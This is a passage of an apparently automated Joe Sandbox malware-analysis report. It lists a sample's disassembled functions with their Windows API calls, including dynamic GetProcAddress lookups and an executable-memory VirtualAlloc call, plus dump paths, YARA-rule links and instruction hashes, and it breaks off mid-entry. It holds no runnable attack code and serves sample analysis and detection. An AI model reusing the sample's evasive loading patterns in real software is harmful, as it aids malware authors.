                                                                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 007CA290
                                                                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 007CA29D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend
                                                                                                                                        • String ID: msctls_trackbar32
                                                                                                                                        • API String ID: 3850602802-1010561917
                                                                                                                                        • Opcode ID: b9ca1885cf45479442c31ea49349aa722a242639b7f4c0009e05f2be403bc55e
                                                                                                                                        • Instruction ID: 72989ef87e68d709003daf9dffc60cdabddcb3c235682881cc74fa9c5a21e314
                                                                                                                                        • Opcode Fuzzy Hash: b9ca1885cf45479442c31ea49349aa722a242639b7f4c0009e05f2be403bc55e
                                                                                                                                        • Instruction Fuzzy Hash: 1111E371200308BBEF205F65CC46FAB3BA9FFC8B58F11422CFA55A6090D276E851CB60
                                                                                                                                        Function 00782F5F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,?,00782F11,00000000), ref: 00782F79
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00782F80
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RoInitialize$combase.dll
                                                                                                                                        • API String ID: 2574300362-340411864
                                                                                                                                        • Opcode ID: deb0c04580db464fed95deb808b5e1af28c7d000e4966a376783b9127710267e
                                                                                                                                        • Instruction ID: 9623708323bd7dafc50f7272c3d5a6f3db55df5aa272676f1cb4b19acc0d7e2c
                                                                                                                                        • Opcode Fuzzy Hash: deb0c04580db464fed95deb808b5e1af28c7d000e4966a376783b9127710267e
                                                                                                                                        • Instruction Fuzzy Hash: 9BE01AB0695344AADB706F71ED89B553669BB08746F00C024B202D50A1CBB98892DF08
                                                                                                                                        Function 00783034 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00782F4E), ref: 0078304E
                                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00783055
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RoUninitialize$combase.dll
                                                                                                                                        • API String ID: 2574300362-2819208100
                                                                                                                                        • Opcode ID: ec95e6670587204fb3cc2f714405f92d44dca2e2ad64d9648b85133bbec7ca26
                                                                                                                                        • Instruction ID: c3294663aae587253bff3b4002d71ef5063e91db9f807b37da1abd7d7a0ba9ac
                                                                                                                                        • Opcode Fuzzy Hash: ec95e6670587204fb3cc2f714405f92d44dca2e2ad64d9648b85133bbec7ca26
                                                                                                                                        • Instruction Fuzzy Hash: 5EE0B6B0686340EBDB305F65EE4DB553A69BB08B42F108024F109D90B1CBB949218F18
                                                                                                                                        Function 007DBA51 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LocalTime__swprintf
                                                                                                                                        • String ID: %.3d$WIN_XPe
                                                                                                                                        • API String ID: 2070861257-2409531811
                                                                                                                                        • Opcode ID: df47b60835100cb5f14455efc361950ec446aaf4c8ffc49b0af3e7d533c0908a
                                                                                                                                        • Instruction ID: c50a55fbf258e47446cbf5c5ee7f5534d7ad99a91d38dd72e968a9bac110d2e7
                                                                                                                                        • Opcode Fuzzy Hash: df47b60835100cb5f14455efc361950ec446aaf4c8ffc49b0af3e7d533c0908a
                                                                                                                                        • Instruction Fuzzy Hash: 3BE0127180801CFACB14D6908C469FA77BCBB48300F51C4D3B916D2200D33D9B94AB12
                                                                                                                                        Function 007C20F6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007C20EC,?,007BF751), ref: 007C2104
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 007C2116
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetProcessId$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-399901964
                                                                                                                                        • Opcode ID: aea5084912c6cb45fda3caaf8527aef972c7acebbb32f8d54d0426669d6ed042
                                                                                                                                        • Instruction ID: 3a4ede1b224dd8d61cf969523de880960af6bb543b8b874febd6455d6f146966
                                                                                                                                        • Opcode Fuzzy Hash: aea5084912c6cb45fda3caaf8527aef972c7acebbb32f8d54d0426669d6ed042
                                                                                                                                        • Instruction Fuzzy Hash: 82D0A7745003568FD7305F64E84DB8237D9FF08300B05841DE659D1256D77CC8C0CB10
                                                                                                                                        Function 0077E6E3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0077E6D9,0000000C,0077E55B,007FDC28,?,?), ref: 0077E6F1
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0077E703
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: IsWow64Process$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-3024904723
                                                                                                                                        • Opcode ID: 8e5b44ac6bb8af72c2d0782b3cf6e05810389139526b4d2a8c95e84710d8dbf1
                                                                                                                                        • Instruction ID: aa5e3f854c977355045e06b79d25f1bee6c76e3954d76bdc75e6dbf09e06165d
                                                                                                                                        • Opcode Fuzzy Hash: 8e5b44ac6bb8af72c2d0782b3cf6e05810389139526b4d2a8c95e84710d8dbf1
                                                                                                                                        • Instruction Fuzzy Hash: 53D052744003528EDB342B68AC886833BE9BF08300B01846AE4A9D2252DAB8C8908B90
                                                                                                                                        Function 0077E6A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,0077E69C,?,0077E43F), ref: 0077E6B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0077E6C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-192647395
                                                                                                                                        • Opcode ID: 4c2442be3542cf6bbe8d239fdb6423a091140393295380ac5b27533e67885fd8
                                                                                                                                        • Instruction ID: 417231d7e587e771f2bb13f0bd9a1b059cd0324906e529a4e5cf474c695b5c07
                                                                                                                                        • Opcode Fuzzy Hash: 4c2442be3542cf6bbe8d239fdb6423a091140393295380ac5b27533e67885fd8
                                                                                                                                        • Instruction Fuzzy Hash: CFD0A9744003528FDB305F78E85868236E9FF2C301B01D46EE4A9D2270DBBCD8E08B58
                                                                                                                                        Function 007BEBB9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(kernel32.dll,?,007BEBAF,?,007BEAAC), ref: 007BEBC7
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 007BEBD9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                        • API String ID: 2574300362-1816364905
                                                                                                                                        • Opcode ID: 35bfd4f19c733c04663cece838f8d3f30c352d552fd7160f46476bf9be3005bf
                                                                                                                                        • Instruction ID: 436b3fcabc117c6afc0df3f93b700901c433c114e45943bc87d0d412cd6ef348
                                                                                                                                        • Opcode Fuzzy Hash: 35bfd4f19c733c04663cece838f8d3f30c352d552fd7160f46476bf9be3005bf
                                                                                                                                        • Instruction Fuzzy Hash: 8ED052B44053528FDB301F78A888BC236E9FF08304B21C82AE8A6D2350DAB8DC808A14
                                                                                                                                        Function 007A137B Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,?,007A135F,?,007A1440), ref: 007A1389
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 007A139B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                        • API String ID: 2574300362-1071820185
                                                                                                                                        • Opcode ID: 1d815bbe65e378aca3757ff89553dbe7397a8de7dd11058dbba341c767c8a2c2
                                                                                                                                        • Instruction ID: 39680929ca8f26bc5d272d88dcadfbd9e81291fbf8f5fa29d301f72c9e908d5f
                                                                                                                                        • Opcode Fuzzy Hash: 1d815bbe65e378aca3757ff89553dbe7397a8de7dd11058dbba341c767c8a2c2
                                                                                                                                        • Instruction Fuzzy Hash: 14D0A730900712AFEB304F28E84878136D9FF4C304F05841DE495D1650D67CC8C08714
                                                                                                                                        Function 007A13A6 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,007A1371,?,007A1519), ref: 007A13B4
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 007A13C6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                        • API String ID: 2574300362-1587604923
                                                                                                                                        • Opcode ID: ef348aa3722bd5243ff8bc41cc5ffd4c443e1105000e16ea0721f6643623639e
                                                                                                                                        • Instruction ID: 4bbd6f74db4648af1a87dbffcde4555571a3dea55b6b84884f555ed295a84265
                                                                                                                                        • Opcode Fuzzy Hash: ef348aa3722bd5243ff8bc41cc5ffd4c443e1105000e16ea0721f6643623639e
                                                                                                                                        • Instruction Fuzzy Hash: 22D0A7304007129FEB300F28E84864536EEFF88308F01841DE465D5660DA7CC8C4C710
                                                                                                                                        Function 007C3ACC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,?,007C3AC2,?,007C29F5), ref: 007C3ADA
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 007C3AEC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                        • API String ID: 2574300362-4033151799
                                                                                                                                        • Opcode ID: 2649e1fd163ce85704f1ee7a2a784956f61b2699f6c83553f261fd24ceff55d4
                                                                                                                                        • Instruction ID: ec1ccf8ec96fe199861b0005d183d3a412b4fcddb6414652925f5bb49f860560
                                                                                                                                        • Opcode Fuzzy Hash: 2649e1fd163ce85704f1ee7a2a784956f61b2699f6c83553f261fd24ceff55d4
                                                                                                                                        • Instruction Fuzzy Hash: 33D05E304013178ED7208B24A849A8537D9EF19304B01D42EE4A5D2250EAB8C8808614
                                                                                                                                        Function 0076AA70 Relevance: 6.3, APIs: 4, Instructions: 300COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,007B6AA6), ref: 0076AB2D
                                                                                                                                        • _wcscmp.LIBCMT ref: 0076AB49
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper_wcscmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 820872866-0
                                                                                                                                        • Opcode ID: 92474a1282c7544cd67b9d5dfb536f6c3e038225c0cf3e2d77de2525915de865
                                                                                                                                        • Instruction ID: 70c0f53e41252cbde0a6cf4b4ed8bf098df61cb8ac1436bd386d41b083dd95dc
                                                                                                                                        • Opcode Fuzzy Hash: 92474a1282c7544cd67b9d5dfb536f6c3e038225c0cf3e2d77de2525915de865
                                                                                                                                        • Instruction Fuzzy Hash: 3BA1037070010AEBDB15DF65E9856ADB7B5FF44300F64816AEC4BA3290EB389C70DB92
                                                                                                                                        Function 007C0D01 Relevance: 6.3, APIs: 4, Instructions: 300memoryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007C0D85
                                                                                                                                        • CharLowerBuffW.USER32(?,?), ref: 007C0DC8
                                                                                                                                          • Part of subcall function 007C0458: CharLowerBuffW.USER32(?,?,?,?), ref: 007C0478
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 007C0FB2
                                                                                                                                        • _memmove.LIBCMT ref: 007C0FC2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3659485706-0
                                                                                                                                        • Opcode ID: ca35285cf4941b332105cd0c82b61bac65b2f561aa7c53c633a1bcb6d1f47f3c
                                                                                                                                        • Instruction ID: 6d9c2151be4d4bb40b695353b44070b287bbdca302b68d757e4e8fc7530ef061
                                                                                                                                        • Opcode Fuzzy Hash: ca35285cf4941b332105cd0c82b61bac65b2f561aa7c53c633a1bcb6d1f47f3c
                                                                                                                                        • Instruction Fuzzy Hash: 40B18D71604301CFC714DF28C884A5ABBE4EF89754F14896DF88A9B352DB39ED46CB91
                                                                                                                                        Function 007BAF26 Relevance: 6.3, APIs: 4, Instructions: 268COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 007BAF56
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BAF61
                                                                                                                                          • Part of subcall function 007A1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 007A10B8
